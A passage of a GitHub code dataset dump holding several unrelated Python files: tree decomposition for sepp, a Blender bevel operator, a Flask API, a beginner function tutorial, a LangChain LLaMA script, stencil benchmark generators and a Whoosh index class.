DEFINITIVO.py","file_ext":"py","file_size_in_byte":5653,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4823222270","text":"# uym2 added\n# June 2017\n# utils for tree decomposition\n\n\nfrom dendropy import Tree\ntry:\n from queue import Queue # python 3\nexcept ImportError:\n from Queue import Queue # python 2\n# from tree import PhylogeneticTree\nfrom sepp import get_logger\n\n_LOG = get_logger(__name__)\n\n\ndef decompose_by_diameter(a_tree, strategy, max_size=None, min_size=None,\n max_diam=None):\n def __ini_record__():\n for node in a_tree.postorder_node_iter():\n __update_node__(node)\n\n def __find_midpoint_edge__(tre):\n u = tre.seed_node.bestLCA.anchor\n uel = u.edge_length if u.edge_length else 0\n d = 0\n while d + uel < tre.seed_node.diameter / 2:\n d += uel\n u = u.parent_node\n uel = u.edge_length if u.edge_length else 0\n return u.edge\n\n def __find_centroid_edge__(tre):\n u = tre.seed_node\n product = 0\n acc_nleaf = 0\n\n while not u.is_leaf():\n max_child = None\n max_child_nleaf = 0\n for ch in u.child_node_iter():\n if ch.nleaf > max_child_nleaf:\n max_child_nleaf = ch.nleaf\n max_child = ch\n acc_nleaf += (u.nleaf-max_child.nleaf)\n new_product = max_child.nleaf * acc_nleaf\n if new_product <= product:\n break\n product = new_product\n u = max_child\n\n return u.edge\n\n def __bisect__(tre, edg):\n # e = __find_centroid_edge__(t)\n\n u = edg.tail_node\n v = edg.head_node\n\n u.remove_child(v)\n tr1 = Tree(seed_node=v)\n\n if u.num_child_nodes() == 1:\n p = u.parent_node\n v = u.child_nodes()[0]\n l_v = v.edge_length if v.edge_length else 0\n u.remove_child(v)\n # u is the seed_node; this means the tree runs out of all but one\n # side\n if p is None:\n tre.seed_node = v\n return tre, tr1\n l_u = u.edge_length if u.edge_length else 0\n p.remove_child(u)\n p.add_child(v)\n v.edge_length = l_u + l_v\n u = p\n\n while u is not None:\n __update_node__(u)\n u = u.parent_node\n\n return tre, tr1\n\n def __clean_up__(tre):\n for node in tre.postorder_node_iter():\n delattr(node, \"nleaf\")\n delattr(node, \"anchor\")\n # delattr(node,\"maxheight\")\n delattr(node, \"maxdepth\")\n delattr(node, \"diameter\")\n # delattr(node,\"topo_diam\")\n delattr(node, \"bestLCA\")\n\n def __update_node__(node):\n if node.is_leaf():\n node.anchor = node\n # node.maxheight = 0\n node.maxdepth = 0\n node.diameter = 0\n # node.topo_diam = 0\n node.bestLCA = node\n node.nleaf = 1\n return\n\n # n1 = -1\n # n2 = -1\n d1 = -1\n d2 = -1\n 
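# Hedged alternative to the duplicate-rejection loop in the castaway game
# above (the record's own comment hints at random.sample): draw unique
# castaway positions in a single call.
import itertools, random

width, height, n_castaways = 5, 4, 6
cells = list(itertools.product(range(1, width + 1), range(1, height + 1)))
positions = random.sample(cells, n_castaways)   # unique (x, y) pairs
assert len(set(positions)) == n_castaways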
anchor1 = None\n node.diameter = 0\n # node.topo_diam = 0\n node.bestLCA = None\n node.nleaf = 0\n\n for ch in node.child_node_iter():\n node.nleaf += ch.nleaf\n# n = ch.maxheight + 1\n d = ch.maxdepth + ch.edge_length if ch.edge_length else 0\n# if n > n1:\n# n2 = n1\n# n1 = n\n# anchor2 = anchor1\n# anchor1 = ch.anchor\n# elif n > n2:\n# n2 = n\n# anchor2 = ch.anchor\n if d > d1:\n d2 = d1\n d1 = d\n anchor1 = ch.anchor\n elif d > d2:\n d2 = d\n if ch.diameter > node.diameter:\n node.diameter = ch.diameter\n node.bestLCA = ch.bestLCA\n# node.diameter = max(ch.diameter,node.diameter)\n\n# node.diameter = max(d1+d2, node.diameter)\n node.maxdepth = d1\n# node.maxheight = n1\n node.anchor = anchor1\n if d1+d2 > node.diameter:\n node.diameter = d1+d2\n node.bestLCA = node\n\n def __get_breaking_edge__(tre, edge_type):\n if tre.seed_node.nleaf <= max_size and \\\n tre.seed_node.diameter <= max_diam:\n return None\n if edge_type == 'midpoint':\n ed = __find_midpoint_edge__(tre)\n elif edge_type == 'centroid':\n ed = __find_centroid_edge__(tre)\n else:\n _LOG.warning((\"Invalid decomposition type! Please use either \"\n \"'midpoint' or 'centroid'\"))\n return None\n\n n = ed.head_node.nleaf\n if (n < min_size) or (tre.seed_node.nleaf - n) < min_size:\n return None\n return ed\n\n def __check_stop__(tre):\n return ((tre.seed_node.nleaf <= max_size and\n tre.seed_node.diameter <= max_diam) or\n (tre.seed_node.nleaf // 2 < min_size))\n\n def __break_by_MP_centroid__(tre):\n ed = __get_breaking_edge__(tre, 'midpoint')\n if ed is None:\n # print(\"Midpoint failed. Trying centroid decomposition...\")\n ed = __get_breaking_edge__(tre, 'centroid')\n # else:\n # print(\"Successfully splitted by midpoint\")\n return ed\n\n def __break(tre):\n if strategy == \"centroid\":\n return __get_breaking_edge__(tre, 'centroid')\n elif strategy == \"midpoint\":\n return __break_by_MP_centroid__(tre)\n else:\n raise Exception(\"strategy not valid: %s\" % strategy)\n\n tqueue = Queue()\n\n _LOG.debug(\"Starting brlen decomposition ...\")\n __ini_record__()\n min_size = min_size if min_size else 0\n max_size = max_size if max_size else a_tree.seed_node.nleaf\n max_diam = max_diam if max_diam else a_tree.seed_node.diameter\n\n _LOG.debug(\n \"Now breaking by %s with min %d and max %d sizes and diameter %f ...\" %\n (strategy, min_size, max_size, max_diam))\n # try using midpoint\n e = __break(a_tree)\n\n if e is None:\n __clean_up__(a_tree)\n return [a_tree]\n\n tree_map = []\n tqueue.put((a_tree, e))\n while not tqueue.empty():\n t, e = tqueue.get()\n t1, t2 = __bisect__(t, e)\n e1 = __break(t1)\n if e1 is None:\n __clean_up__(t1)\n tree_map.append(t1)\n else:\n tqueue.put((t1, e1))\n e2 = __break(t2)\n if e2 is None:\n __clean_up__(t2)\n tree_map.append(t2)\n else:\n tqueue.put((t2, e2))\n\n return tree_map\n","repo_name":"smirarab/sepp","sub_path":"sepp/decompose_tree.py","file_name":"decompose_tree.py","file_ext":"py","file_size_in_byte":6623,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"48"} +{"seq_id":"28738632304","text":"import os\nimport bpy\nimport bmesh\nfrom bpy.props import *\nimport bgl\nimport blf\nfrom . 
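# Hedged toy version of the centroid-edge search in decompose_by_diameter()
# above: descend toward the heaviest child while the split product
# nleaf(max_child) * leaves_cut_so_far keeps growing. The dict tree below is
# a made-up stand-in, so no dendropy is needed:
tree = {'r': ['a', 'b'], 'a': ['c', 'd'], 'b': [], 'c': [], 'd': []}

def nleaf(node):
    kids = tree[node]
    return 1 if not kids else sum(nleaf(k) for k in kids)

u, product, acc = 'r', 0, 0
while tree[u]:
    max_child = max(tree[u], key=nleaf)
    acc += nleaf(u) - nleaf(max_child)
    if nleaf(max_child) * acc <= product:
        break
    product = nleaf(max_child) * acc
    u = max_child
print('centroid edge ends at', u)   # 'a' for this toy tree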
utils.blender_ui import get_dpi, get_dpi_factor\n\n\n##############################\n#NEW MODAL BEVEL\n#############################\n\n\ndef draw_callback_pb(self, context):\n\n font_id = 0 # XXX, need to find out how best to get this.\n #set_drawing_dpi(display.get_dpi() * scale_factor)\n #dpi_factor = display.get_dpi_factor() * scale_factor\n #line_height = 18 * dpi_factor\n \n is_bool = False\n is_bevel = False\n is_bevel_3 = False\n is_bevel_2 = False\n is_solidify = False\n is_multiselected = False\n is_notselected = False\n is_noactiveobject = False\n multislist = bpy.context.selected_objects\n activeobject = bpy.context.scene.objects.active\n is_formerge = False\n current_dir = os.path.basename(os.path.dirname(os.path.abspath(__file__)))\n user_preferences = bpy.context.user_preferences\n addon_pref = user_preferences.addons[current_dir].preferences\n x = get_dpi()\n scale_factor = 0.9\n dpi_factor = get_dpi_factor() * scale_factor\n\n if len(multislist) > 1:\n is_multiselected = True\n if len(multislist) < 1:\n is_notselected = True\n if activeobject == None:\n is_noactiveobject = True\n\n for obj in bpy.context.selected_objects:\n if obj.name.startswith(\"AP\"):\n is_formerge = True\n pass\n\n for mode in bpy.context.object.modifiers :\n if mode.type == 'BEVEL' :\n if mode.limit_method == 'WEIGHT':\n is_bevel = True\n if mode.type == \"BEVEL\":\n if mode.profile > 0.70 and mode.profile < 0.72:\n is_bevel_3 = True\n #print(\"Bevel 3 is true\")\n if mode.type == \"BEVEL\":\n if mode.limit_method == 'ANGLE' or mode.limit_method == 'NONE':\n is_bevel_2 = True\n #print(\"Bevel 2 is true\")\n if mode.type == 'BOOLEAN' :\n is_bool = True\n if mode.type == 'SOLIDIFY':\n is_solidify = True\n #Min and Max Idea\n if self.lvl == 1:\n #Show Segments Size\n bgl.glEnable(bgl.GL_BLEND)\n blf.position(font_id, self.click_pos[0], self.click_pos[1]+0.83 * get_dpi(), 0)\n bgl.glColor4f(1.0, 1.0, 1.0, 0.5)\n blf.size(font_id, 12, get_dpi())\n blf.draw(font_id, \" (Min)\")\n \n if self.lvl == 16:\n #Show Segments Size\n bgl.glEnable(bgl.GL_BLEND)\n blf.position(font_id, self.click_pos[0], self.click_pos[1]+0.83 * get_dpi(), 0)\n bgl.glColor4f(1.0, 1.0, 1.0, 0.5)\n blf.size(font_id, 12, get_dpi())\n blf.draw(font_id, \" (Max)\")\n \n #Show Segments Size\n bgl.glEnable(bgl.GL_BLEND)\n blf.position(font_id, self.click_pos[0], self.click_pos[1]+0.55 * get_dpi() , 0)\n bgl.glColor4f(1.0, 1.0, 1.0, 0.5)\n blf.size(font_id, 36, get_dpi())\n blf.draw(font_id, str(self.lvl))\n \n # And Underline Up Top\n #blf.position(font_id, self.click_pos[0], self.click_pos[1]+34, 0)\n bgl.glEnable(bgl.GL_BLEND)\n bgl.glColor4f(1.0, 1.0, 1.0, 0.5)\n bgl.glLineWidth(int(0.032* get_dpi()) )\n bgl.glBegin(bgl.GL_LINE_STRIP)\n #bgl.glVertex2d(20, 40)\n for n in range(-1,int(2.7 * get_dpi()) ): bgl.glVertex2i(self.click_pos[0]+n+2, self.click_pos[1]+int(get_dpi()/2.2))\n bgl.glEnd() \n \n #Show All Bevel Information \n bgl.glEnable(bgl.GL_BLEND) \n blf.position(font_id, self.click_pos[0], self.click_pos[1]+0.208 * get_dpi(), 0)\n bgl.glColor4f(1.0, 1.0, 1.0, 0.5)\n blf.size(font_id, 12, get_dpi())\n blf.draw(font_id, \"B-Width - \" + '%.3f'%( self.mouse_pos) + \" / \" + \" / \" + \"(W) - \" + bpy.context.object.modifiers[\"Bevel\"].offset_type)\n #blf.draw(font_id, \"Bevel Width - \" + '%.3f'%( self.mouse_pos) + \" / \" + \"Segments - \" + str(self.lvl) + \" / \" + \"(W)idth Method - \" + bpy.context.object.modifiers[\"Bevel\"].offset_type)\n \n # And Underline Up Bottom\n\n bgl.glEnable(bgl.GL_BLEND)\n bgl.glColor4f(1.0, 1.0, 
1.0, 0.5)\n    bgl.glLineWidth(int(0.032* get_dpi()) )\n    bgl.glBegin(bgl.GL_LINE_STRIP)\n\n    for n in range(-1,int(2.7 * get_dpi()) ): bgl.glVertex2i(self.click_pos[0]+n+2, self.click_pos[1]+int(get_dpi()/10.2))\n    bgl.glEnd() \n    \n    #Show Additional Mesh Information \n    bgl.glEnable(bgl.GL_BLEND) \n    blf.position(font_id, self.click_pos[0], self.click_pos[1]-0.13* get_dpi(), 0)\n    bgl.glColor4f(1.0, 1.0, 1.0, 0.5)\n    blf.size(font_id, 12, get_dpi())\n    if is_bevel_2 == True:\n        blf.draw(font_id, \"Standard Mesh\")\n    elif is_bevel_3 == True:\n        blf.draw(font_id, \"CStep / Sstep - Warning: Bevels could not be showing due to bevel baking.\")\n    elif is_bevel == True:\n        blf.draw(font_id, \"CSsharp / Ssharp\")\n    elif is_bool == True:\n        blf.draw(font_id, \"Pending Boolean - Warning: Bevels could not be showing due to boolean pending.\")\n    \n    if addon_pref.Diagnostics_Mode :\n        #Diagnostic\n        blf.position(font_id, self.click_pos[0], self.click_pos[1]-0.37* get_dpi(), 0)\n        bgl.glEnable(bgl.GL_BLEND)\n        bgl.glColor4f(1.0, 1.0, 1.0, 0.5)\n        blf.size(font_id, 12, get_dpi())\n        blf.draw(font_id, \"Standard is - \" + str(is_bevel_2) + \" \" + \"Sstep is - \" + str(is_bevel_3)+ \" \" + \"CSharp is - \" + str(is_bevel))\n\n    \nclass nwBevel(bpy.types.Operator):\n    bl_idname = \"view3d.bevelx\"\n    bl_label = \"BevelSpecial (NW)\"\n    bl_options = {'REGISTER', 'UNDO'} \n\n    first_mouse_x = IntProperty()\n    first_value = FloatProperty()\n    angle = FloatProperty()\n    \n    def vdist(self):\n        area=bpy.context.window.screen.areas[0]\n        for x in bpy.context.window.screen.areas:\n            if x.type=='VIEW_3D': area=x\n\n        area.spaces[0].region_3d.view_distance\n        return area.spaces[0].region_3d.view_distance\n    \n    def modal(self, context, event):\n        context.area.tag_redraw()\n\n        if event.type == 'MOUSEMOVE':\n\n            delta = self.first_mouse_x - event.mouse_x\n            \n            self.mouse_pos=round(self.mouse_pos*10000)/10000\n            #print (self.activeA)\n\n            bpy.context.object.modifiers[self.bname].width = self.first_value + delta * 0.0008\n            self.mouse_pos = round(bpy.context.object.modifiers[self.bname].width *10000)/10000\n\n        if event.type == 'MOUSEMOVE' and event.shift:\n\n            delta = self.first_mouse_x - event.mouse_x\n            \n            self.mouse_pos=round(self.mouse_pos*10000)/10000\n            #print (self.activeA)\n\n            bpy.context.object.modifiers[self.bname].width = self.first_value + delta * 0.0001\n            self.mouse_pos = round(bpy.context.object.modifiers[self.bname].width *10000)/10000\n\n        elif event.type == 'W' and event.value=='PRESS':\n            modt=bpy.context.object.modifiers[self.bname].offset_type\n            i=0\n            \n            for x in self.atype:\n                i+=1\n                if modt==x: break\n            if i==3: i=0 \n\n            bpy.context.object.modifiers[self.bname].offset_type=self.atype[i]\n            self.activeA=self.atype[i]\n\n        elif event.type == 'LEFTMOUSE':\n            bpy.types.SpaceView3D.draw_handler_remove(self._handle, 'WINDOW')\n            return {'FINISHED'}\n\n        elif event.type == 'SPACE':\n            bpy.types.SpaceView3D.draw_handler_remove(self._handle, 'WINDOW')\n            return {'FINISHED'}\n\n\n        elif event.type == 'WHEELUPMOUSE':\n\n            if(self.lvl<16): self.lvl+=1\n            bpy.context.object.modifiers[self.bname].segments=self.lvl\n\n        elif event.type == 'NUMPAD_PLUS' and event.value=='PRESS':\n\n            if(self.lvl<16): self.lvl+=1\n            bpy.context.object.modifiers[self.bname].segments=self.lvl\n        \n        \n        elif event.type == 'WHEELDOWNMOUSE':\n            \n            if(self.lvl>1): self.lvl-=1\n            bpy.context.object.modifiers[self.bname].segments=self.lvl \n\n        elif event.type == 'NUMPAD_MINUS' and event.value=='PRESS':\n            \n            if(self.lvl>1): self.lvl-=1\n            bpy.context.object.modifiers[self.bname].segments=self.lvl \n\n        elif 
event.type in {'DEL', 'BACK_SPACE'}:\n bpy.ops.object.modifier_remove(modifier=self.bname)\n return {'CANCELLED'} \n \n elif event.type in {'RIGHTMOUSE', 'ESC'}:\n i=-1\n \n if event.type == 'ESC' and self.newlyCreated: bpy.ops.object.modifier_remove(modifier=self.bname) \n\n bpy.types.SpaceView3D.draw_handler_remove(self._handle, 'WINDOW')\n bpy.context.object.draw_type = 'TEXTURED'\n return {'CANCELLED'}\n\n return {'RUNNING_MODAL'}\n\n def invoke(self, context, event):\n if context.area.type == 'VIEW_3D':\n # the arguments we pass the the callback\n obj=bpy.context.object\n is_bevel = False\n\n\n for mode in bpy.context.object.modifiers :\n if mode.type == 'BEVEL' :\n is_bevel = True\n\n if is_bevel == False:\n bpy.context.object.modifiers.new(\"Bevel\", \"BEVEL\")\n bpy.context.object.modifiers[\"Bevel\"].use_clamp_overlap = False\n bpy.context.object.modifiers[\"Bevel\"].show_in_editmode = False\n #bpy.context.object.modifiers[\"Bevel\"].width = bevelwidth\n bpy.context.object.modifiers[\"Bevel\"].segments = 3\n bpy.context.object.modifiers[\"Bevel\"].profile = 0.70\n bpy.context.object.modifiers[\"Bevel\"].show_in_editmode = True\n \n self.first_value = context.object.modifiers[\"Bevel\"].width\n hasBevel=False\n subd=0\n i=0\n bname=\"\"\n self.newlyCreated=False\n \n for mod in obj.modifiers:\n i+=1\n #print (mod.type)\n if mod.type==\"SUBSURF\":\n subd=i\n #print (\"SUBSURFACE!!\")\n if mod.type==\"BEVEL\" and mod.limit_method!='WEIGHT':\n hasBevel=True\n bname=mod.name\n \n if subd==0:\n for mod in obj.modifiers:\n if mod.type==\"SUBSURF\":\n subd=i\n\n \n if not hasBevel:\n\n #bpy.ops.object.modifier_add(type='BEVEL')\n bname=bpy.context.object.modifiers[\"Bevel\"].name\n #bpy.context.object.modifiers[len(bpy.context.object.modifiers)-1].use_clamp_overlap = False\n #elf.newlyCreated=True\n\n\n #bpy.context.object.modifiers[len(bpy.context.object.modifiers)-1].limit_method='WEIGHT'\n #bpy.context.object.modifiers[len(bpy.context.object.modifiers)-1].width=self.vdist()/50\n\n\n obj.update_from_editmode() # Loads edit-mode data into object data\n self.bname=bname\n bpy.ops.object.mode_set(mode='OBJECT')\n \n self.lvl=bpy.context.object.modifiers[self.bname].segments \n self.slvl=self.lvl\n self.click_pos=[event.mouse_region_x,event.mouse_region_y];\n self.mouse_pos = event.mouse_x\n self.first_mouse_x = event.mouse_x\n self.startPos=bpy.context.object.modifiers[self.bname].width;\n args = (self, context)\n\n \n self.atype=['OFFSET', 'WIDTH', 'DEPTH', 'PERCENT']\n self.btype=['NONE', 'ANGLE', 'WEIGHT', 'VGROUP']\n \n modt=bpy.context.object.modifiers[self.bname].offset_type\n i=0\n for x in self.atype:\n i+=1\n if modt==x: break\n #if i>3: i=0 \n self.activeA=self.atype[i-1]\n \n \n modL=bpy.context.object.modifiers[self.bname].limit_method\n i=0\n for x in self.atype:\n i+=1\n if modL==x: break\n if i>=3: i=0 \n self.activeL=self.btype[i]\n \n\n \n self._handle = bpy.types.SpaceView3D.draw_handler_add(draw_callback_pb, args, 'WINDOW', 'POST_PIXEL')\n\n\n context.window_manager.modal_handler_add(self)\n return {'RUNNING_MODAL'}\n else:\n self.report({'WARNING'}, \"View3D not found, cannot run operator\")\n return {'CANCELLED'}\n","repo_name":"mx1001/hops_p","sub_path":"modal_bevel.py","file_name":"modal_bevel.py","file_ext":"py","file_size_in_byte":12405,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"34793582969","text":"from json import dumps\nfrom math import inf\n\nfrom flask import session, request\nfrom flask.views 
import MethodView\nfrom project.modules import modules, public\nfrom project.web.pydocs.libs.auth import login_required\n\n\nclass SystemAPI(MethodView):\n init_every_request = False\n\n def __init__(self):\n ...\n\n @login_required()\n def post(self):\n _request = request.json\n site_id = _request.get(\"site_id\", None)\n print(_request)\n\n if session.get(\"level\", inf) <= 2:\n _ret = public.siteDatas[\"*\"]\n else:\n _userSites = session.get(\"sites\", [])\n if _userSites:\n _ret = public.siteDatas[_userSites]\n else:\n _ret = []\n\n if site_id is None:\n return dumps([{y: z for y, z in x.items() if y in [\"id\", \"site_name\"]} for x in _ret])\n\n _ret = [x[\"areas\"] for x in _ret if x[\"id\"] == site_id]\n if _ret:\n _ret = _ret[0]\n\n block_id = _request.get(\"block_id\", None)\n if block_id is None:\n return dumps([{y: z for y, z in x.items() if y in [\"id\", \"name\"]} for x in _ret])\n\n _ret = [x for x in _ret if x[\"id\"] == block_id]\n if not _ret:\n return dumps([])\n _ret = _ret[0]\n\n system_id = _request.get(\"system_id\", None)\n if system_id is None:\n return dumps(_ret[\"systems\"])\n _devices = [{\"device_id\": x.device_id, \"device_name\": x.device_name, \"connected\": x.connected} for x in public.deviceClients.values() if x.site_id == site_id\n and x.block_id == block_id and x.system_id == system_id]\n return dumps(_devices)\n\n\nmodules.app.add_url_rule(f\"/api/test\", view_func=SystemAPI.as_view(\"api111111\"))\n","repo_name":"Emre06-gazi/SiteManagementSystems","sub_path":"server/project/web/pydocs/apis/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"24795608780","text":"# 函数只要不调用,就不执行\ndef test1():\n print('t1开始')\n print('t1结束')\n\n\ndef test2():\n print('t2开始')\n test1()\n print('t2结束')\n\n\ntest2()\n\n\n# 定义函数求n~m之间所有整数之和\ndef count(n, m):\n nums = 0\n for i in range(n, m):\n nums += i\n return nums\n\n\nprint(count(0, 101))\n\n\n# 定义一个函数,求n的阶乘\ndef factorial(n):\n x = 1\n for i in range(1, n + 1):\n x *= i\n return x\n\n\nprint(factorial(5))\n\n\n# 计算m的阶乘之和\ndef fac_sum(m):\n x = 0\n for i in range(1, m + 1):\n x += factorial(i) # 调用factorial函数\n return x\n\n\nprint(fac_sum(5))\n","repo_name":"weizt/python_studying","sub_path":"函数/05-函数调用函数的方法.py","file_name":"05-函数调用函数的方法.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"3005930985","text":"from transformers import LlamaTokenizer, LlamaForCausalLM, GenerationConfig, pipeline\nfrom transformers import BitsAndBytesConfig\n\nfrom langchain.llms import HuggingFacePipeline\nfrom langchain import PromptTemplate, LLMChain\nfrom langchain import PromptTemplate, LLMChain\nfrom langchain.chains import ConversationChain\nfrom langchain.chains.conversation.memory import ConversationBufferWindowMemory\n\nimport torch\n\nquantization_config = BitsAndBytesConfig(llm_int8_enable_fp32_cpu_offload=True)\n\ntokenizer = LlamaTokenizer.from_pretrained(\"decapoda-research/llama-7b-hf\")\n\nbase_model = LlamaForCausalLM.from_pretrained(\n \"decapoda-research/llama-7b-hf\",\n quantization_config=quantization_config,\n # load_in_8bit=True,\n # device_map='auto',\n)\n\npipe = pipeline(\n \"text-generation\",\n model=base_model, \n tokenizer=tokenizer, \n max_length=256,\n temperature=0.6,\n top_p=0.95,\n repetition_penalty=1.2\n)\n\nlocal_llm = HuggingFacePipeline(pipeline=pipe)\n\ntemplate = 
\"\"\"Below is an instruction that describes a task. Write a response that appropriately completes the request.\n\n### Instruction: \n{instruction}\n\nAnswer:\"\"\"\n\nprompt = PromptTemplate(template=template, input_variables=[\"instruction\"])\n\n\nllm_chain = LLMChain(prompt=prompt, \n llm=local_llm\n )\n\nquestion = \"What is the capital of India?\"\nprint(llm_chain.run(question))\n\n\nwindow_memory = ConversationBufferWindowMemory(k=7)\n\nconversation = ConversationChain(\n llm=local_llm, \n verbose=True, \n memory=window_memory\n)\n\nprint(conversation.prompt.template)\n\nconversation.prompt.template = '''The following is a friendly conversation between a human and an AI called Alpaca. \n\nCurrent conversation:\n{history}\nHuman: {input}\nAI:'''\n\nconversation.predict(input=\"What is your name?\")\n\n","repo_name":"ori257/Alpaca_Ori_Code","sub_path":"langchain_code.py","file_name":"langchain_code.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20355129022","text":"import abc\n\nfrom stencil_benchmarks.benchmarks_collection.stencils import base\n\nfrom .mixin import StencilMixin\n\n\nclass BasicStencilMixin(StencilMixin):\n @abc.abstractmethod\n def stencil_body(self):\n pass\n\n def template_file(self):\n return 'basic.j2'\n\n def template_args(self):\n return dict(**super().template_args(), body=self.stencil_body())\n\n\nclass Copy(BasicStencilMixin, base.CopyStencil):\n def stencil_body(self):\n n = self.storage_block_size // self.vector_size\n return (f'for (index_t v = 0; v < {n}; ++v)\\n'\n f' storent(&out[idx + v * {self.vector_size}], \\n'\n f' load(&inp[idx + v * {self.vector_size}]));')\n\n\nclass OnesidedAverage(BasicStencilMixin, base.OnesidedAverageStencil):\n def stencil_body(self):\n n = self.storage_block_size // self.vector_size\n o = f'v * {self.vector_size}'\n stride = self.blocked_strides[self.axis]\n if self.axis == 0:\n p1 = ', '.join(f'{i + 1}' for i in range(self.vector_size))\n return (f'vec_t inp_c, inp_pv;\\n'\n f'for (index_t v = 0; v < {n}; ++v) {{\\n'\n f' if (v == 0) inp_c = load(&inp[idx]);\\n'\n f' else inp_c = inp_pv;\\n'\n f' if (v == {n - 1})\\n'\n f' inp_pv = load(&inp[idx + {stride}]);\\n'\n f' else\\n'\n f' inp_pv = load(\\n'\n f' &inp[idx + (v + 1) * {self.vector_size}]);\\n'\n f' vec_t inp_p1 = shuffle(inp_c, inp_pv, {p1});\\n'\n f' storent(&out[idx + {o}], (inp_c + inp_p1) / 2);\\n'\n f'}}\\n')\n else:\n return (f'for (index_t v = 0; v < {n}; ++v) {{\\n'\n f' vec_t inp_c = load(&inp[idx + {o}]);\\n'\n f' vec_t inp_p1 = load(&inp[idx + {stride} + {o}]);\\n'\n f' storent(&out[idx + {o}], (inp_c + inp_p1) / 2);\\n'\n f'}}\\n')\n\n\nclass SymmetricAverage(BasicStencilMixin, base.SymmetricAverageStencil):\n def stencil_body(self):\n n = self.storage_block_size // self.vector_size\n o = f'v * {self.vector_size}'\n stride = self.blocked_strides[self.axis]\n if self.axis == 0:\n m1 = ', '.join(f'{i - 1}' for i in range(self.vector_size, 2 *\n self.vector_size))\n p1 = ', '.join(f'{i + 1}' for i in range(self.vector_size))\n return (f'vec_t inp_mv, inp_c, inp_pv;\\n'\n f'for (index_t v = 0; v < {n}; ++v) {{\\n'\n f' if (v == 0) {{\\n'\n f' inp_mv = load(&inp[idx - {stride}\\n'\n f' + {n - 1} * {self.vector_size}]);\\n'\n f' inp_c = load(&inp[idx]);\\n'\n f' }} else {{\\n'\n f' inp_mv = inp_c;\\n'\n f' inp_c = inp_pv;\\n'\n f' }}\\n'\n f' if (v == {n - 1})\\n'\n f' inp_pv = load(&inp[idx + {stride}]);\\n'\n f' else\\n'\n f' inp_pv = load(\\n'\n 
f' &inp[idx + (v + 1) * {self.vector_size}]);\\n'\n f' vec_t inp_m1 = shuffle(inp_mv, inp_c, {m1});\\n'\n f' vec_t inp_p1 = shuffle(inp_c, inp_pv, {p1});\\n'\n f' storent(&out[idx + {o}], (inp_m1 + inp_p1) / 2);\\n'\n f'}}\\n')\n else:\n return (f'for (index_t v = 0; v < {n}; ++v) {{\\n'\n f' vec_t inp_m1 = load(&inp[idx - {stride} + {o}]);\\n'\n f' vec_t inp_p1 = load(&inp[idx + {stride} + {o}]);\\n'\n f' storent(&out[idx + {o}], (inp_m1 + inp_p1) / 2);\\n'\n f'}}\\n')\n\n\nclass Laplacian(BasicStencilMixin, base.LaplacianStencil):\n def stencil_body(self):\n n = self.storage_block_size // self.vector_size\n o = f'v * {self.vector_size}'\n code = ''\n if self.along_x:\n code += 'vec_t inp_imvjk, inp_ijk, inp_ipvjk;\\n'\n code += f'for (index_t v = 0; v < {n}; ++v) {{\\n'\n terms = []\n if self.along_x:\n stride = self.blocked_strides[0]\n m1 = ', '.join(f'{i - 1}' for i in range(self.vector_size, 2 *\n self.vector_size))\n p1 = ', '.join(f'{i + 1}' for i in range(self.vector_size))\n code += (\n f' if (v == 0) {{\\n'\n f' inp_imvjk = load(&inp[idx - {stride}\\n'\n f' + {n - 1} * {self.vector_size}]);\\n'\n f' inp_ijk = load(&inp[idx]);\\n'\n f' }} else {{\\n'\n f' inp_imvjk = inp_ijk;\\n'\n f' inp_ijk = inp_ipvjk;\\n'\n f' }}\\n'\n f' if (v == {n - 1})\\n'\n f' inp_ipvjk = load(&inp[idx + {stride}]);\\n'\n f' else\\n'\n f' inp_ipvjk = load(\\n'\n f' &inp[idx + (v + 1) * {self.vector_size}]);\\n'\n f' vec_t inp_im1jk = shuffle(inp_imvjk, inp_ijk, {m1});\\n'\n f' vec_t inp_ip1jk = shuffle(inp_ijk, inp_ipvjk, {p1});\\n')\n terms += ['inp_im1jk', 'inp_ip1jk']\n else:\n code += f'vec_t inp_ijk = load(&inp[idx + {o}]);\\n'\n if self.along_y:\n stride = self.blocked_strides[1]\n code += (\n f' vec_t inp_ijm1k = load(&inp[idx - {stride} + {o}]);\\n'\n f' vec_t inp_ijp1k = load(&inp[idx + {stride} + {o}]);\\n')\n terms += ['inp_ijm1k', 'inp_ijp1k']\n if self.along_z:\n stride = self.blocked_strides[2]\n code += (\n f' vec_t inp_ijkm1 = load(&inp[idx - {stride} + {o}]);\\n'\n f' vec_t inp_ijkp1 = load(&inp[idx + {stride} + {o}]);\\n')\n terms += ['inp_ijkm1', 'inp_ijkp1']\n code += (f' storent(&out[idx + {o}], {len(terms)} * inp_ijk - (' +\n ' + '.join(terms) + '));'\n '}\\n')\n return code\n","repo_name":"GridTools/stencil_benchmarks","sub_path":"stencil_benchmarks/benchmarks_collection/stencils/openmp_blocked/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":6326,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"43140327482","text":"from whoosh.index import create_in, open_dir\nfrom whoosh.qparser import QueryParser\nfrom whoosh.fields import *\nfrom whoosh.query import *\nimport os.path\nimport config\nimport sys\nfrom bot import Bot\nimport shutil\nfrom dateutil import parser\nfrom post import Post\nINF = 100000\n\n# deals with fetching/storing/searching data in the index\nclass Index:\n def __init__(self):\n # define schema for the index\n schema = self.get_schema()\n self.bot = Bot()\n try:\n self.ix = open_dir(config.index_directory)\n self.update_index()\n except:\n # if issues loading index, create index from scratch\n if os.path.exists(config.index_directory):\n shutil.rmtree(config.index_directory)\n os.mkdir(config.index_directory)\n self.ix = create_in(config.index_directory, schema)\n self.create_index()\n\n # tentative schema, can add more indices to this\n def get_schema(self):\n # build index on post and subject; not storing them\n # store raw json in 'json' field\n return Schema(\n 
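# TEXT fields are indexed for full-text search, STORED keeps the raw post JSON for display, and NUMERIC/BOOLEAN/DATETIME back the range and filter queries below\n            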
